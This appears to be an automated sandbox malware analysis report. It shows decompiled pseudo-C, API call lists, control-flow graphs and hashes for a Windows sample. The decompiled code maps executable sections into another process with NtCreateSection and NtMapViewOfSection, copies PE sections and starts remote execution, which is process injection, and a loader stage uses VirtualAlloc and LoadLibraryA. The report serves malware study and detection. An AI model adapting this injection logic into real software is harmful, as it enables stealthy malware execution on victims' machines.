                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                                                          • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 4014dd-4014f1 call 40119e 325 4014f3 321->325 326 4014f6-4014fb 321->326 325->326 328 401501-401512 326->328 329 401824-40182c 326->329 333 401822 328->333 334 401518-401541 328->334 329->326 332 401831-401842 329->332 336 401845-401866 call 40119e 332->336 337 401838-40183e 332->337 333->332 334->333 344 401547-40155e NtDuplicateObject 334->344 337->336 344->333 346 401564-401588 NtCreateSection 344->346 348 4015e4-40160a NtCreateSection 346->348 349 40158a-4015ab NtMapViewOfSection 346->349 348->333 351 401610-401614 348->351 349->348 350 4015ad-4015c9 NtMapViewOfSection 349->350 350->348 352 4015cb-4015e1 350->352 351->333 353 40161a-40163b NtMapViewOfSection 351->353 352->348 353->333 354 401641-40165d NtMapViewOfSection 353->354 354->333 356 401663 call 401668 354->356
                                                          C-Code - Quality: 63%
                                                          			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				signed int _t162;
                                                          				void* _t163;
                                                          				intOrPtr* _t164;
                                                          				void* _t167;
                                                          				long _t175;
                                                          				intOrPtr _t177;
                                                          				void* _t178;
                                                          				long* _t184;
                                                          				intOrPtr* _t186;
                                                          				HANDLE* _t187;
                                                          				HANDLE* _t188;
                                                          				void* _t193;
                                                          				void* _t194;
                                                          				intOrPtr* _t197;
                                                          				void* _t198;
                                                          				void* _t201;
                                                          				void* _t202;
                                                          				intOrPtr* _t204;
                                                          				void* _t207;
                                                          				intOrPtr* _t208;
                                                          				void* _t209;
                                                          				long _t224;
                                                          
                                                          				L0040119E(_t84, __ecx, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                          				_t175 = 0;
                                                          				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
                                                          				_t184 = _t202 - 0x60;
                                                          				 *_t184 = _t175;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
                                                          				_t90 =  *_t184;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t202 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t175;
                                                          					_t186 = _t202 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                                                          					 *_t186 = 0x18;
                                                          					_push(_t202 - 0x30);
                                                          					_push(_t186);
                                                          					_push(0x40);
                                                          					_push(_t202 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
                                                          						 *(_t202 - 8) = _t175;
                                                          						_t98 = _t202 - 0x50;
                                                          						 *(_t98 + 4) = _t175;
                                                          						 *_t98 = 0x5000;
                                                          						_t187 = _t202 - 0x54;
                                                          						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
                                                          							 *_t25 =  *(_t202 - 0x50);
                                                          							_t121 = _t202 - 0x44;
                                                          							 *_t121 = _t175;
                                                          							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                                                          								_t123 = _t202 - 0x3c;
                                                          								 *_t123 = _t175;
                                                          								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                                                          									_t201 =  *(_t202 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
                                                          									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                          									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t202 - 0x50;
                                                          						 *(_t100 + 4) = _t175;
                                                          						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                          						_t188 = _t202 - 0x58;
                                                          						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
                                                          							 *_t46 =  *(_t202 - 0x50);
                                                          							_t102 = _t202 - 0x48;
                                                          							 *_t102 = _t175;
                                                          							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                                                          								_t104 = _t202 - 0x40;
                                                          								 *_t104 = _t175;
                                                          								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
                                                          								if(_t224 == 0) {
                                                          									L16();
                                                          									if(_t224 == 0 && _t224 != 0) {
                                                          									}
                                                          									_t207 = _t204 + 4;
                                                          									_push(0x2e62);
                                                          									_t208 = _t207 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t208;
                                                          									_t209 = _t208 + 4;
                                                          									_t160 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t161 = _t160;
                                                          									asm("loop 0xffffffc2");
                                                          									_t162 = _t161 ^ 0xbcc951dd;
                                                          									_t204 = _t209 - _t162;
                                                          									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                          									_t139 =  *(_t193 + 6) & 0x0000ffff;
                                                          									_push(_t193);
                                                          									_t163 = _t193;
                                                          									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                          										_t164 = _t163 + 0xf8;
                                                          										__eflags = _t164;
                                                          									} else {
                                                          										_t164 = _t163 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t164 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                          										_t204 = _t204 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t194);
                                                          									_t229 =  *((intOrPtr*)(_t202 - 0x34));
                                                          									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                          										_push(_t194);
                                                          										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
                                                          										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
                                                          										__eflags = _t197;
                                                          										while(1) {
                                                          											__eflags =  *_t197;
                                                          											if( *_t197 == 0) {
                                                          												break;
                                                          											}
                                                          											_t177 =  *_t197;
                                                          											_t197 = _t197 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t198);
                                                          										_t175 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t202 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L49();
                                                          										_pop(_t178);
                                                          										_t175 = _t178 - 0x1760;
                                                          										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
                                                          										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t204;
                                                          				return L0040119E(_t91, _t131, _t175, _t229);
                                                          			}

                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                                                          • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 358 714147-714160 359 714162-714164 358->359 360 714166 359->360 361 71416b-714177 CreateToolhelp32Snapshot 359->361 360->361 362 714187-714194 Module32First 361->362 363 714179-71417f 361->363 364 714196-714197 call 713e06 362->364 365 71419d-7141a5 362->365 363->362 368 714181-714185 363->368 369 71419c 364->369 368->359 368->362 369->365
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071416F
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 0071418F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_70d000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3833638111-0
                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction ID: bd8b681950721d90c0ca9bf564cb958d5b278c0403dfa175dcbbb0608e42e01a
                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction Fuzzy Hash: 33F0CD36200719BBD7203BF8AC8DBAB76ECAF58324F100528E642910C0DAB8E8C54A61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 6d003c-6d0047 1 6d004c-6d0263 call 6d0a3f call 6d0e0f call 6d0d90 VirtualAlloc 0->1 2 6d0049 0->2 17 6d028b-6d0292 1->17 18 6d0265-6d0289 call 6d0a69 1->18 2->1 20 6d02a1-6d02b0 17->20 22 6d02ce-6d03c2 VirtualProtect call 6d0cce call 6d0ce7 18->22 20->22 23 6d02b2-6d02cc 20->23 29 6d03d1-6d03e0 22->29 23->20 30 6d0439-6d04b8 VirtualFree 29->30 31 6d03e2-6d0437 call 6d0ce7 29->31 33 6d04be-6d04cd 30->33 34 6d05f4-6d05fe 30->34 31->29 36 6d04d3-6d04dd 33->36 37 6d077f-6d0789 34->37 38 6d0604-6d060d 34->38 36->34 40 6d04e3-6d0505 36->40 41 6d078b-6d07a3 37->41 42 6d07a6-6d07b0 37->42 38->37 43 6d0613-6d0637 38->43 51 6d0517-6d0520 40->51 52 6d0507-6d0515 40->52 41->42 44 6d086e-6d08be LoadLibraryA 42->44 45 6d07b6-6d07cb 42->45 46 6d063e-6d0648 43->46 50 6d08c7-6d08f9 44->50 48 6d07d2-6d07d5 45->48 46->37 49 6d064e-6d065a 46->49 53 6d0824-6d0833 48->53 54 6d07d7-6d07e0 48->54 49->37 55 6d0660-6d066a 49->55 56 6d08fb-6d0901 50->56 57 6d0902-6d091d 50->57 58 6d0526-6d0547 51->58 52->58 62 6d0839-6d083c 53->62 59 6d07e4-6d0822 54->59 60 6d07e2 54->60 61 6d067a-6d0689 55->61 56->57 63 6d054d-6d0550 58->63 59->48 60->53 64 6d068f-6d06b2 61->64 65 6d0750-6d077a 61->65 62->44 66 6d083e-6d0847 62->66 72 6d0556-6d056b 63->72 73 6d05e0-6d05ef 63->73 67 6d06ef-6d06fc 64->67 68 6d06b4-6d06ed 64->68 65->46 69 6d0849 66->69 70 6d084b-6d086c 66->70 74 6d06fe-6d0748 67->74 75 6d074b 67->75 68->67 69->44 70->62 76 6d056d 72->76 77 6d056f-6d057a 72->77 73->36 74->75 75->61 76->73 80 6d057c-6d0599 77->80 81 6d059b-6d05bb 77->81 84 6d05bd-6d05db 80->84 81->84 84->63
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: 5ebbe460fe37c58c253ed573dd18450252dbf76ec07c608bcbb3694c3860dc94
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 23525874E012299FDB64CF58C985BA8BBB1BF09304F1480DAE94DAB351DB30AA95DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 371 6d0e0f-6d0e24 SetErrorMode * 2 372 6d0e2b-6d0e2c 371->372 373 6d0e26 371->373 373->372
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: d737391412cb78383b34bd059ac362a3996041c191b4104b2eff9d787dbb4a53
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: C7D0123154512877D7102A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 401869-4018bd call 40119e Sleep call 4013d8 385 4018cc-401907 call 40119e 374->385 386 4018bf-4018c7 call 4014a8 374->386 386->385
                                                          C-Code - Quality: 62%
                                                          			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				intOrPtr _t8;
                                                          				void* _t11;
                                                          				intOrPtr _t13;
                                                          				intOrPtr* _t16;
                                                          				signed char _t19;
                                                          				void* _t20;
                                                          				intOrPtr* _t21;
                                                          				intOrPtr* _t22;
                                                          
                                                          				_t24 = __eflags;
                                                          				_push(0x18a0);
                                                          				_t8 =  *_t21;
                                                          				_t22 = _t21 + 4;
                                                          				L0040119E(_t8, 0x63, _t20, __eflags);
                                                          				_t16 = _a4;
                                                          				Sleep(0x1388);
                                                          				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
                                                          				_t25 = _t11;
                                                          				if(_t11 != 0) {
                                                          					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
                                                          				}
                                                          				 *_t16(0xffffffff, 0);
                                                          				_push(0x18a0);
                                                          				_t13 =  *_t22;
                                                          				return L0040119E(_t13, 0x63, _t20, _t25);
                                                          			}

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                                                          • Opcode Fuzzy Hash: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 397 713e06-713e40 call 714119 400 713e42-713e75 VirtualAlloc call 713e93 397->400 401 713e8e 397->401 403 713e7a-713e8c 400->403 401->401 403->401
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00713E57
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_70d000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction ID: bb95685b5f3da37770b211d6aedd59c5d8c1ced81a7c08a3d14be0477cabcd4b
                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction Fuzzy Hash: FF113F79A00208EFDB01DF98C985E99BBF5AF08750F058094F9489B361D375EA90DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 404 40188b-4018bd call 40119e Sleep call 4013d8 411 4018cc-401907 call 40119e 404->411 412 4018bf-4018c7 call 4014a8 404->412 412->411
                                                          C-Code - Quality: 62%
                                                          			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
                                                          				void* _t13;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t19;
                                                          				signed char _t24;
                                                          				void* _t28;
                                                          				intOrPtr* _t30;
                                                          
                                                          				_t33 = __eflags;
                                                          				_t25 = __edi;
                                                          				asm("out 0xdc, al");
                                                          				_t24 = __eax;
                                                          				L0040119E(__edx, 0x63, __edi, __eflags);
                                                          				_t19 =  *((intOrPtr*)(_t28 + 8));
                                                          				Sleep(0x1388);
                                                          				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
                                                          				_t34 = _t13;
                                                          				if(_t13 != 0) {
                                                          					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
                                                          				}
                                                          				 *_t19(0xffffffff, 0);
                                                          				_push(0x18a0);
                                                          				_t15 =  *_t30;
                                                          				return L0040119E(_t15, 0x63, _t25, _t34);
                                                          			}

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                                                          • Opcode Fuzzy Hash: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 423 40189a-4018bd call 40119e Sleep call 4013d8 429 4018cc-401907 call 40119e 423->429 430 4018bf-4018c7 call 4014a8 423->430 430->429
                                                          C-Code - Quality: 61%
                                                          			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				intOrPtr _t13;
                                                          				intOrPtr* _t17;
                                                          				signed char _t21;
                                                          				void* _t25;
                                                          				intOrPtr* _t27;
                                                          
                                                          				_t30 = __eflags;
                                                          				_t22 = __edi;
                                                          				_pop(ds);
                                                          				L0040119E(_t8, __ecx, __edi, __eflags);
                                                          				_t17 =  *((intOrPtr*)(_t25 + 8));
                                                          				Sleep(0x1388);
                                                          				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                                                          				_t31 = _t11;
                                                          				if(_t11 != 0) {
                                                          					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                          				}
                                                          				 *_t17(0xffffffff, 0);
                                                          				_push(0x18a0);
                                                          				_t13 =  *_t27;
                                                          				return L0040119E(_t13, 0x63, _t22, _t31);
                                                          			}











                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$GetProcAddress.$l
                                                          • API String ID: 0-2784972518
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
